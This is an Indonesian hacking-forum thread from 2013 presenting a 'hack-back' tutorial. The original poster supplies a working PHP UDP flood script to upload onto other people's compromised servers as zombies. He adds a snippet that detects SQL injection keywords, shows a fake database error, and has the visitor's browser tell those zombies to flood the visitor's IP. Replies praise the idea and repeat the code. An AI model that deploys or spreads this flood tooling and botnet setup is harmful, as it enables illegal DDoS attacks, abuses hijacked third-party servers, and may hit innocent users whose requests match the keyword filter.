Indonesian Back|Track Team
Lawan Sqli dengan DDOS!!! - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Defensive Zone (https://www.indonesianbacktrack.or.id/forum/forum-173.html)
+--- Forum: Solutions & Patching (https://www.indonesianbacktrack.or.id/forum/forum-186.html)
+--- Thread: Lawan Sqli dengan DDOS!!! (/thread-4619.html)

Pages: 1 2


Lawan Sqli dengan DDOS!!! - xnod_die - 05-25-2013

Hallo ane balik lagi msh berhubungan dengan sql injection,,, (:|
yah memang kadang2 pertahanan yang baik itu tw cara menyerang,, tapi disini kita bertahan dengan membalikkan serangan dengan bertubi-tubi Angry

siapkan peralatan kalian hmmm,,,,
1. server2 yg sudah kalian tanam zombie2 buat ddos (bisa pake script UDP FLOOD yg di buat ma om Zee di thread attacker zone
2. membuat script untuk melakukan serangan secara automatis,, yeahh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
pertama siapkan file php,, untuk di tanam di server2 orang,, (jgn cuman dipes mlu yah kerjanya Smile )
bisa pake script ini jga,, ini sebenrnya script UDP FLOOD dari om zee,, cuman dah ane ubah dikit2..
PHP Code:
<?
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);
    
    $exec_time = 100;
    
    $time = time();
    $max_time = $time+$exec_time;

    $host = $_REQUEST['host'];
    
    for($i=0;$i<65000;$i++){
            $out .= 'X';
    }
    while(1){
    $packets++;
            if(time() > $max_time){
                    break;
            }
            $rand = rand(1,65000);
            $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                    fclose($fp);
            }
    }
?>
nah silahkan upload file udp flood itu di server orang,, makin banyak makin asik... ksh nama aja ddos.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
langsung aja kita buat script php untuk melakukan serangan otomatis,, nah silahkan copas script ini di confih.php web anda,, atau bisa jga di file2 yg sering di load
PHP Code:
$ip=$_SERVER['REMOTE_ADDR'];
if (isset(
$_GET['id']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i'$_GET['id']))
{
echo 
"mysql_fetch_array() expects parameter 1 to /home/namawebanda/public_html/index.php on line 22"//buat nampilin bug boongan
?>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script>
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server2.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server3.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
</script>
<?

nah maksud dari
Code:
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
misalnya web yg ada file ddos saya di server1.com/ddos.php
jika anda udah punya zombie di web orang,, silahkan tambahkan saja di atas code </script>

nah sekian dari saya... semoga sangat membantu yah,,


RE: Lawan Sqli dengan DDOS!!! - blu3creter - 05-25-2013

om, asli logikanya keren banget , wkwkwkwk, counter attack counter attack sayangnya ane masih mau belajar nih bikin server sendiri, tpi rate 2 dah buat om
jadi zombienya yg ini aja kan om yah yg yg di ganti http://www.server1,2,3.com/ ?

oh iya I love backtrack om, kwkwkwkwk


RE: Lawan Sqli dengan DDOS!!! - green_word - 05-25-2013

ane belajar PHP belum sapek segini , haha ,berarti script2 buat protect dari inject di PHP itu bukan benterng paling kuat ya ??

-_-


RE: Lawan Sqli dengan DDOS!!! - wine trochanter - 05-25-2013

nice tut kk, meskipun saya bingung Sad
+1 dari ane Smile


RE: Lawan Sqli dengan DDOS!!! - Junior Riau - 05-25-2013

(05-25-2013, 09:28 AM)green_word Wrote: ane belajar PHP belum sapek segini , haha ,berarti script2 buat protect dari inject di PHP itu bukan benterng paling kuat ya ??

-_-

siapa bilang??

protect beda dengan attack mas

coba perhatikan . itu TS nya bahas attack back si attacker, dengan kata lain sembari mem protect juga meng attack balik
bukan protect doank

buktinya site ku cuma pake protect dari kode php aja belum jebol, aku udah open pentest malah


RE: Lawan Sqli dengan DDOS!!! - alkaaf - 05-25-2013

nice tutorial om. sebenernya konsepnya sederhana. kita membuat sebuah server palsu (honeypot) dengan keterangan vulnerable boongan juga Big Grin untuk memicu ddos melewati penyamaan pattern perintah bug sqli yang biasanya dipake untuk menyerang. liat kode di bawah ni
PHP Code:
if (isset($_GET['id']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i'$_GET['id'])) 
ngga asing kan bagi yang sering sqli? Big Grin nah. apabila terdapat beberapa perintah bug sqli tersebut, maka yang akan dilakukan adalah membuka halaman zombie yang udah terpasang ddos untuk menyerang balik (counter attack) sekalian nampilin bug boongan Smile
PHP Code:
else {
echo 
"mysql_fetch_array() expects parameter 1 to /home/namawebanda/public_html/index.php on line 22"//buat nampilin bug boongan
?>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script>
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server2.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server3.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
</script>
<?

maap neh Big Grin cuman memperjelas aja buat yang kurang paham ama konsepnya Big Grin cmiiw


RE: Lawan Sqli dengan DDOS!!! - green_word - 05-25-2013

haha , gue cuma bisa protect enggak bisa script buat lawan balik , hehehe


RE: Lawan Sqli dengan DDOS!!! - xnod_die - 05-26-2013

(05-25-2013, 09:01 AM)blu3creter Wrote: om, asli logikanya keren banget , wkwkwkwk, counter attack counter attack sayangnya ane masih mau belajar nih bikin server sendiri, tpi rate 2 dah buat om
jadi zombienya yg ini aja kan om yah yg yg di ganti ,2,3.com/ ?

oh iya I love backtrack om, kwkwkwkwk

iya om tinggal ganti aja yg server1,2,3 mas nama web yg dah di upload udp flood.. :-bd


RE: Lawan Sqli dengan DDOS!!! - ibalabala - 05-28-2013

wahh keren. logika nya...


RE: Lawan Sqli dengan DDOS!!! - justlearn - 05-30-2013

menyimak, mempelajari dulu. terima kasih atas share tutorialnya